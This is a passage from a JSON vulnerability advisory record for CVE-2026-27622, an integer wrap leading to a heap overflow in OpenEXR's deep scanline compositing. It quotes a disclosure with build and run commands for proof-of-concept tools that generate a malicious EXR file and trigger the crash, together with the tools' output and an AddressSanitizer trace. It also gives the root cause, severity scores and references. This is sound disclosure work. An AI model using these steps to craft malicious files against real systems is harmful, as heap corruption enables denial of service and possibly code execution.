-B build-asan \\\n  -DOPENEXR_BUILD_POC=ON \\\n  -DCMAKE_BUILD_TYPE=RelWithDebInfo \\\n  -DCMAKE_C_FLAGS='-fsanitize=address,undefined -fno-omit-frame-pointer' \\\n  -DCMAKE_CXX_FLAGS='-fsanitize=address,undefined -fno-omit-frame-pointer' \\\n  -DCMAKE_EXE_LINKER_FLAGS='-fsanitize=address,undefined' \\\n  -DCMAKE_SHARED_LINKER_FLAGS='-fsanitize=address,undefined'\n\ncmake --build build-asan --target composite_writer simple_exr_reader -j\n```\n\nGenerate malicious file (decode-path focused profile):\n\n```bash\nASAN_OPTIONS=detect_leaks=0 timeout 180s \\\n  ./build-asan/poc/composite_writer \\\n  --profile low-ram \\\n  --file /tmp/composite_decode_focus.exr\n```\n\nTrigger:\n\n```bash\nASAN_OPTIONS=detect_leaks=0 timeout 30s \\\n  ./build-asan/poc/simple_exr_reader /tmp/composite_decode_focus.exr\n```\n\nASAN builds are slower. If needed, a non-sanitized build + debugger is faster for iteration.\n\n## Example runs\n\nWriter (abbrev):\n\n```bash\n❯ ./build-asan/poc/composite_writer\nexploit math:\n  benign samples                 : 300\n  malicious parts                : 86\n  malicious samples per part     : 50000000\n  true total samples             : 4300000300\n  uint32 overflow reached        : yes\n  wrapped uint32 total           : 5033004\n  composite Z/A alloc from wrap  : 40264032 bytes (38.40 MiB)\n  per-part unpacked sample bytes : 300000000 bytes (286.10 MiB)\n  min parts to overflow (current benign/samples): 86\nwriting compressed multipart deep EXR: /tmp/composite_deep_scanline_e2e_compressed.exr\nwriting donor malicious part (50000000 samples)\ncopying malicious part 1/86 from donor chunk\n...\nfile size: 26112896 bytes (24.90 MiB)\n```\n\nReader ASAN crash:\n\n```bash\n❯ ./build-asan/poc/simple_exr_reader\nreading /tmp/composite_overflow_optimized.exr with 16 deepscanline parts\n=================================================================\n==175024==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x7ed1a55d90b0 at pc 0x7ed1da7854f7 bp 
0x7ffe8c83a680 sp 0x7ffe8c83a670\nWRITE of size 4 at 0x7ed1a55d90b0 thread T0\n    #0 0x7ed1da7854f6 in generic_unpack_deep_pointers /home/pop/sec/openexr/src/lib/OpenEXRCore/unpack.c:1374\n    #1 0x7ed1da7623e9 in exr_decoding_run /home/pop/sec/openexr/src/lib/OpenEXRCore/decoding.c:664\n    #2 0x7ed1dbcb153b in run_decode /home/pop/sec/openexr/src/lib/OpenEXR/ImfDeepScanLineInputFile.cpp:816\n    #3 0x7ed1dbcc597f in Imf_4_0::DeepScanLineInputFile::Data::readData(Imf_4_0::DeepFrameBuffer const&, int, int, bool) /home/pop/sec/openexr/src/lib/OpenEXR/ImfDeepScanLineInputFile.cpp:568\n    #4 0x7ed1dbc01ca4 in Imf_4_0::CompositeDeepScanLine::readPixels(int, int) /home/pop/sec/openexr/src/lib/OpenEXR/ImfCompositeDeepScanLine.cpp:576\n    #5 0x64669005f233 in main /home/pop/sec/openexr/poc/simple_exr_reader.cpp:88\n    #6 0x7ed1d942a1c9 in __libc_start_call_main ../sysdeps/nptl/libc_start_call_main.h:58\n    #7 0x7ed1d942a28a in __libc_start_main_impl ../csu/libc-start.c:360\n    #8 0x6466900601e4 in _start (/home/pop/sec/openexr/build-asan/poc/simple_exr_reader+0x1b1e4) (BuildId: 86b018d0dce48def6ca06be031266f0205c914d2)\n\n0x7ed1a55d90b0 is located 0 bytes after 820132016-byte region [0x7ed1747b5800,0x7ed1a55d90b0)\nallocated by thread T0 here:\n    #0 0x7ed1dd0fe548 in operator new(unsigned long) ../../../../src/libsanitizer/asan/asan_new_delete.cpp:95\n    #1 0x7ed1dbc29600 in std::__new_allocator<float>::allocate(unsigned long, void const*) /usr/include/c++/13/bits/new_allocator.h:151\n    #2 0x7ed1dbc29600 in std::allocator_traits<std::allocator<float> >::allocate(std::allocator<float>&, unsigned long) /usr/include/c++/13/bits/alloc_traits.h:482\n    #3 0x7ed1dbc29600 in std::_Vector_base<float, std::allocator<float> >::_M_allocate(unsigned long) /usr/include/c++/13/bits/stl_vector.h:381\n    #4 0x7ed1dbc29600 in std::_Vector_base<float, std::allocator<float> >::_M_allocate(unsigned long) /usr/include/c++/13/bits/stl_vector.h:378\n    #5 0x7ed1dbc29600 in 
std::vector<float, std::allocator<float> >::_M_default_append(unsigned long) /usr/include/c++/13/bits/vector.tcc:663\n    #6 0x7ed1dbc00184 in std::vector<float, std::allocator<float> >::resize(unsigned long) /usr/include/c++/13/bits/stl_vector.h:1016\n    #7 0x7ed1dbc00184 in Imf_4_0::CompositeDeepScanLine::readPixels(int, int) /home/pop/sec/openexr/src/lib/OpenEXR/ImfCompositeDeepScanLine.cpp:535\n    #8 0x64669005f233 in main /home/pop/sec/openexr/poc/simple_exr_reader.cpp:88\n    #9 0x7ed1d942a1c9 in __libc_start_call_main ../sysdeps/nptl/libc_start_call_main.h:58\n    #10 0x7ed1d942a28a in __libc_start_main_impl ../csu/libc-start.c:360\n    #11 0x6466900601e4 in _start (/home/pop/sec/openexr/build-asan/poc/simple_exr_reader+0x1b1e4) (BuildId: 86b018d0dce48def6ca06be031266f0205c914d2)\n\nSUMMARY: AddressSanitizer: heap-buffer-overflow /home/pop/sec/openexr/src/lib/OpenEXRCore/unpack.c:1374 in generic_unpack_deep_pointers\nShadow bytes around the buggy address:\n  0x7ed1a55d8e00: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00\n  0x7ed1a55d8e80: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00\n  0x7ed1a55d8f00: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00\n  0x7ed1a55d8f80: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00\n  0x7ed1a55d9000: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00\n=>0x7ed1a55d9080: 00 00 00 00 00 00[fa]fa fa fa fa fa fa fa fa fa\n  0x7ed1a55d9100: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa\n  0x7ed1a55d9180: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa\n  0x7ed1a55d9200: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa\n  0x7ed1a55d9280: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa\n  0x7ed1a55d9300: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa\nShadow byte legend (one shadow byte represents 8 application bytes):\n  Addressable:           00\n  Partially addressable: 01 02 03 04 05 06 07\n  Heap left redzone:       fa\n  Freed heap region:       fd\n  Stack left redzone:      f1\n  Stack mid redzone:       f2\n  Stack 
right redzone:     f3\n  Stack after return:      f5\n  Stack use after scope:   f8\n  Global redzone:          f9\n  Global init order:       f6\n  Poisoned by user:        f7\n  Container overflow:      fc\n  Array cookie:            ac\n  Intra object redzone:    bb\n  ASan internal:           fe\n  Left alloca redzone:     ca\n  Right alloca redzone:    cb\n==175024==ABORTING\n```\n\n## Root cause analysis\n\nIn `CompositeDeepScanLine::readPixels`:\n\n1. Per-pixel totals are accumulated in `vector<unsigned int> total_sizes`.\n2. For attacker-controlled large counts across many parts, `total_sizes[ptr]` wraps modulo `2^32`.\n3. `overall_sample_count` is then derived from wrapped totals and used in `samples[channel].resize(overall_sample_count)`.\n4. Decode pointer setup/consumption proceeds with true sample counts, and write operations in core unpack (`generic_unpack_deep_pointers`) overrun the undersized composite sample buffer.\n\n\nAllocation is based on a tiny wrapped value, but decode writes correspond to the true large sample volume.\n\n## Impact\n\nHeap OOB write during decode. This is at minimum a reliable crash/DoS. As heap corruption, this bug could be used for potential remote code execution.",
                    "title": "osv - https://www.googleapis.com/download/storage/v1/b/osv-vulnerabilities/o/PyPI%2FGHSA-cr4v-6jm6-4963.json?alt=media"
                },
                {
                    "category": "description",
                    "text": "No description is available for this CVE.",
                    "title": "redhat - https://access.redhat.com/security/cve/CVE-2026-27622"
                },
                {
                    "category": "description",
                    "text": "OpenEXR provides the specification and reference implementation of the EXR file format, an image storage format for the motion picture industry. In CompositeDeepScanLine::readPixels, per-pixel totals are accumulated in vector<unsigned int> total_sizes; for attacker-controlled large counts across many parts, total_sizes[ptr] wraps modulo 2^32. overall_sample_count is then derived from wrapped totals and used in samples[channel].resize(overall_sample_count). Decode pointer setup/consumption proceeds with true sample counts, and write operations in core unpack (generic_unpack_deep_pointers) overrun the undersized composite sample buffer. This vulnerability is fixed in v3.2.6, v3.3.8, and v3.4.6.",
                    "title": "debian - https://security-tracker.debian.org/tracker/CVE-2026-27622"
                },
                {
                    "category": "other",
                    "text": "0.00013",
                    "title": "EPSS"
                },
                {
                    "category": "other",
                    "text": "CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:A/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N",
                    "title": "CVSSV4"
                },
                {
                    "category": "other",
                    "text": "8.4",
                    "title": "CVSSV4 base score"
                },
                {
                    "category": "other",
                    "text": "3.9",
                    "title": "NCSC Score"
                },
                {
                    "category": "other",
                    "text": "There is exploit data available from source Nvd; the CVE is related to (a version of) an uncommon product",
                    "title": "NCSC Score top decreasing factors"
                },
                {
                    "category": "details",
                    "text": "Severity: 3\n",
                    "title": "Vendor assessment"
                }
            ],
            "product_status": {
                "known_affected": [
                    "CSAFPID-5757224",
                    "CSAFPID-5757225",
                    "CSAFPID-5757226",
                    "CSAFPID-3021051",
                    "CSAFPID-3021052",
                    "CSAFPID-3021053",
                    "CSAFPID-5759241",
                    "CSAFPID-5759242",
                    "CSAFPID-5759243",
                    "CSAFPID-5759244",
                    "CSAFPID-5759245",
                    "CSAFPID-5759246",
                    "CSAFPID-5759247",
                    "CSAFPID-5759248",
                    "CSAFPID-5759249",
                    "CSAFPID-5759250",
                    "CSAFPID-5759251",
                    "CSAFPID-5759252",
                    "CSAFPID-5759253",
                    "CSAFPID-5759254",
                    "CSAFPID-1439315",
                    "CSAFPID-1439317",
                    "CSAFPID-1439319",
                    "CSAFPID-1439321",
                    "CSAFPID-2858634",
                    "CSAFPID-3020246",
                    "CSAFPID-3020248",
                    "CSAFPID-3020250",
                    "CSAFPID-5759811",
                    "CSAFPID-5759812",
                    "CSAFPID-1408023",
                    "CSAFPID-1408024",
                    "CSAFPID-5763878",
                    "CSAFPID-5763879",
                    "CSAFPID-5763880"
                ]
            },
            "references": [
                {
                    "category": "external",
                    "summary": "Source - github",
                    "url": "https://github.com/advisories/GHSA-cr4v-6jm6-4963"
                },
                {
                    "category": "external",
                    "summary": "Source raw - github",
                    "url": "https://api.github.com/advisories/GHSA-cr4v-6jm6-4963"
                },
                {
                    "category": "external",
                    "summary": "Source - nvd",
                    "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-27622"
                },
                {
                    "category": "external",
                    "summary": "Source raw - nvd",
                    "url": "https://services.nvd.nist.gov/rest/json/cves/2.0?cveId=CVE-2026-27622"
                },
                {
                    "category": "external",
                    "summary": "Source - cveprojectv5",
                    "url": "https://www.cve.org/CVERecord?id=CVE-2026-27622"
                },
                {
                    "category": "external",
                    "summary": "Source raw - cveprojectv5",
                    "url": "https://raw.githubusercontent.com/CVEProject/cvelistV5/main/cves/2026/27xxx/CVE-2026-27622.json"
                },
                {
                    "category": "external",
                    "summary": "Source - first",
                    "url": "https://api.first.org/data/v1/epss?cve=CVE-2026-27622"
                },
                {
                    "category": "external",
                    "summary": "Source raw - first",
                    "url": "https://api.first.org/data/v1/epss?limit=10000&offset=0"
                },
                {
                    "category": "external",
                    "summary": "Source - osv",
                    "url": "https://www.googleapis.com/download/storage/v1/b/osv-vulnerabilities/o/PyPI%2FGHSA-cr4v-6jm6-4963.json?alt=media"
                },
                {
                    "category": "external",
                    "summary": "Source - redhat",
                    "url": "https://access.redhat.com/security/cve/CVE-2026-27622"
                },
                {
                    "category": "external",
                    "summary": "Source raw - redhat",
                    "url": "https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2026-27622.json"
                },
                {
                    "category": "external",
                    "summary": "Source - debian",
                    "url": "https://security-tracker.debian.org/tracker/CVE-2026-27622"
                },
                {
                    "category": "external",
                    "summary": "Source - first",
                    "url": "https://api.first.org/data/v1/epss?limit=10000&offset=0"
                },
                {
                    "category": "external",
                    "summary": "Reference - cveprojectv5; github; nvd; osv; redhat",
                    "url": "https://github.com/AcademySoftwareFoundation/openexr/security/advisories/GHSA-cr4v-6jm6-4963"
                },
                {
                    "category": "external",
                    "summary": "Reference - github",
                    "url": "https://github.com/advisories/GHSA-cr4v-6jm6-4963"
                },
                {
                    "category": "external",
                    "summary": "Reference - github; osv; redhat",
                    "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-27622"
                },
                {
                    "category": "external",
                    "summary": "Reference - redhat",
                    "url": "https://www.cve.org/CVERecord?id=CVE-2026-27622"
                }
            ],
            "remediations": [
                {
                    "category": "mitigation",
                    "details": "Mitigation for this issue is either not available or the currently available options do not meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base or stability.",
                    "product_ids": [
                        "CSAFPID-1439315",
                        "CSAFPID-1439317",
                        "CSAFPID-1439319",
                        "CSAFPID-1439321",
                        "CSAFPID-2858634",
                        "CSAFPID-3020246",
                        "CSAFPID-3020248",
                        "CSAFPID-3020250",
                        "CSAFPID-5759811",
                        "CSAFPID-5759812"
                    ]
                }
            ],
            "scores": [
                {
                    "cvss_v3": {
                        "version": "3.1",
                        "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
                        "baseScore": 7.8,
                        "baseSeverity": "HIGH"
                    },
                    "products": [
                        "CSAFPID-1408023",
                        "CSAFPID-1408024",
                        "CSAFPID-1439315",
                        "CSAFPID-1439317",
                        "CSAFPID-1439319",
                        "CSAFPID-1439321",
                        "CSAFPID-2858634",
                        "CSAFPID-3020246",
                        "CSAFPID-3020248",
                        "CSAFPID-3020250",
                        "CSAFPID-3021051",
                        "CSAFPID-3021052",
                        "CSAFPID-3021053",
                        "CSAFPID-5757224",
                        "CSAFPID-5757225",
                        "CSAFPID-5757226",
                        "CSAFPID-5759241",
                        "CSAFPID-5759242",
                        "CSAFPID-5759243",
                        "CSAFPID-5759244",
                        "CSAFPID-5759245",
                        "CSAFPID-5759246",
                        "CSAFPID-5759247",
                        "CSAFPID-5759248",
                        "CSAFPID-5759249",
                        "CSAFPID-5759250",
                        "CSAFPID-5759251",
                        "CSAFPID-5759252",
                        "CSAFPID-5759253",
                        "CSAFPID-5759254",
                        "CSAFPID-5759811",
                        "CSAFPID-5759812",
                        "CSAFPID-5763878",
                        "CSAFPID-5763879",
                        "CSAFPID-5763880"
                    ]
                }
            ],
            "title": "CVE-2026-27622"
        }
    ]
}